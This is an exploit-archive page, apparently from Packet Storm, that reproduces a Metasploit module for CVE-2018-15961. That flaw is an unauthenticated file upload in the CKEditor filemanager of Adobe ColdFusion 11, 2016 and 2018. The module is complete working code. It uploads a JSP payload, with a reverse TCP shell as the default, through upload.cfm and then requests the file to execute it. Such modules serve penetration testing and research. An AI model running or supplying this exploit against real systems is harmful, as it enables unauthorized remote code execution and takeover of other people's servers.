exploit the possibilities

Adobe Coldfusion 11 CKEditor Arbitrary File Upload

Adobe Coldfusion 11 CKEditor Arbitrary File Upload
Posted Jan 10, 2019
Authored by Vahagn Vardanian, Pete Freitag de Foundeo, Qazeer | Site metasploit.com

A file upload vulnerability exists in the CKEditor of Adobe ColdFusion 11 (Update 14 and earlier).

tags | exploit, file upload
advisories | CVE-2018-15961
MD5 | 1295c307779f896cb864d27811f2dbd7

Adobe Coldfusion 11 CKEditor Arbitrary File Upload

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

include Msf::Exploit::Remote::HttpClient

Rank = ExcellentRanking

def initialize(info = {})
super(update_info(info,
'Name' => 'Adobe ColdFusion CKEditor unrestricted file upload',
'Description' => %q{
A file upload vulnerability in the CKEditor of Adobe ColdFusion 11
(Update 14 and earlier), ColdFusion 2016 (Update 6 and earlier), and
ColdFusion 2018 (July 12 release) allows unauthenticated remote
attackers to upload and execute JSP files through the filemanager
plugin.
Tested on Adobe ColdFusion 2018.0.0.310739.
},
'Author' =>
[
'Pete Freitag de Foundeo', # Vulnerability discovery
'Vahagn vah_13 Vardanian', # First public PoC
'Qazeer' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2018-15961' ],
[ 'BID', '105314' ],
[ 'URL', 'https://helpx.adobe.com/fr/security/products/coldfusion/apsb18-33.html' ]
],
'Privileged' => false,
'Platform' => %w{ linux win },
'Arch' => ARCH_JAVA,
'Targets' =>
[
[ 'Java Universal',
{
'Arch' => ARCH_JAVA,
'Platform' => %w{ linux win },
'Payload' => { 'DisableNops' => true },
'DefaultOptions' => {'PAYLOAD' => 'java/jsp_shell_reverse_tcp'}
}
]
],
'DefaultTarget' => 0,
'DefaultOptions' => { 'RPORT' => 8500 },
'DisclosureDate' => 'Sep 11 2018'
))

register_options [
OptString.new('TARGETURI', [ false, 'Base application path', '/' ]),
]
end

def exploit
filename = rand_text_alpha_upper(1..10) + '.jsp'

print_status("Uploading the JSP payload at #{target_uri}cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/#{filename}...")

mime = Rex::MIME::Message.new
mime.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"file\"; filename=\"#{filename}\"")
mime.add_part('path', 'text/plain', nil, 'form-data; name="path"')

post_str = mime.to_s
post_str.strip!

res = send_request_cgi({
'uri' => normalize_uri(target_uri, 'cf_scripts','scripts','ajax','ckeditor','plugins','filemanager','upload.cfm'),
'version' => '1.1',
'method' => 'POST',
'ctype' => 'multipart/form-data; boundary=' + mime.bound,
'data' => post_str,
})

unless res && res.code == 200
fail_with Failure::Unknown, 'Upload Failed...'
end

print_good('Upload succeeded! Executing payload...')

send_request_cgi({
'uri' => normalize_uri(target_uri, 'cf_scripts', 'scripts', 'ajax',
'ckeditor', 'plugins', 'filemanager', 'uploadedFiles', filename),
'method' => 'GET'
}, 5)

end
end

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

January 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    15 Files
  • 2
    Jan 2nd
    15 Files
  • 3
    Jan 3rd
    11 Files
  • 4
    Jan 4th
    1 Files
  • 5
    Jan 5th
    2 Files
  • 6
    Jan 6th
    5 Files
  • 7
    Jan 7th
    24 Files
  • 8
    Jan 8th
    15 Files
  • 9
    Jan 9th
    16 Files
  • 10
    Jan 10th
    23 Files
  • 11
    Jan 11th
    17 Files
  • 12
    Jan 12th
    3 Files
  • 13
    Jan 13th
    2 Files
  • 14
    Jan 14th
    18 Files
  • 15
    Jan 15th
    33 Files
  • 16
    Jan 16th
    23 Files
  • 17
    Jan 17th
    29 Files
  • 18
    Jan 18th
    15 Files
  • 19
    Jan 19th
    0 Files
  • 20
    Jan 20th
    0 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    0 Files
  • 24
    Jan 24th
    0 Files
  • 25
    Jan 25th
    0 Files
  • 26
    Jan 26th
    0 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close